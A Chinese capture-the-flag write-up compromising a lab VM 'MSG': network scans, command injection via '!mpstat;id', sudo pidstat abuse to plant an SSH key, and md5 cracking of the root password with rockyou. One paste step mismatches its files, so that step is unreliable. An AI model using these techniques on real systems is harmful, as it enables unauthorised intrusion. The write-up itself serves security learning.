信息搜集 1 2 3 4 5 6 7 ┌──(root㉿kali)-[~/Desktop/tmp] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered) 192.168.31.2 08:00:27:77:9d:8a PCS Systemtechnik GmbH 192.168.31.158 08:00:27:06:63:ee PCS Systemtechnik GmbH
192.168.31.158就是靶机ip地址
1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.158 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 01:26 EDT Nmap scan report for 192.168.31.158 Host is up (0.00070s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:06:63:EE (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds
80端口 先注册一个账号,是一个留言板,输入!mpstat可以查看cup的状态,但是输入其他命令不行,猜测只能运行mpstat命令用分号拼接一下命令发现可以执行成功
1 2 !mpstat;id Server: Linux 5.10.0-19-amd64 (MSG) 04/24/25 _x86_64_ (1 CPU) 05:30:02 CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 05:30:02 all 1.84 0.01 0.57 0.13 0.00 0.27 0.00 0.00 0.00 97.19 uid=33(www-data) gid=33(www-data) groups=33(www-data)
反弹一个shell
提权 sudo -l
1 2 3 4 5 6 7 www-data@MSG:~$ sudo -l Matching Defaults entries for www-data on MSG: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on MSG: (messagemaster) NOPASSWD: /bin/pidstat
pidstat有一个-e参数可以监控执行的命令
1 sudo -u messagemaster /bin/pidstat -e bash
执行bash会自动退出,那就写一个公钥进去,home目录下没有.ssh先创建一个.ssh文件夹,然后cp进去一个authorized_keys
ssh登录
提权root 1 2 3 4 5 6 messagemaster@MSG:~$ sudo -l Matching Defaults entries for messagemaster on MSG: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User messagemaster may run the following commands on MSG: (ALL) NOPASSWD: /bin/md5sum
可以执行md5sum,在/var/www/文件夹下还有一个ROOTPASS,可以将root的密码进行md5加密
1 2 3 4 messagemaster@MSG:/var/www$ ls -ll total 8 drwxrwxr-- 5 www-data www-data 4096 Nov 18 2022 html -rw-r----- 1 root root 12 Nov 21 2022 ROOTPASS
ROOTPASS的字节是12,说明ROOT的密码是11位的因为最后还有一个换行符,可以先将rockyou.txt里11位的密码先取出来
1 grep -E "^.{11}$" /usr/share/wordlists/rockyou.txt >pass.txt
然后对每行进行md5加密
1 2 ┌──(root㉿kali)-[~/Desktop/tmp] └─# for i in $(cat pass.txt);do echo $i|md5sum>>md5.txt ;done (有点慢)
再用paste将rockyou.txt和这个合并
1 paste -d ':' md5.txt /usr/share/wordlists/rockyou.txt >pass.txt
最后grep一下
1 grep "85c73111b30f9ede8504bb4a4b682f48" pass.txt
可以得到root的密码是Message5687
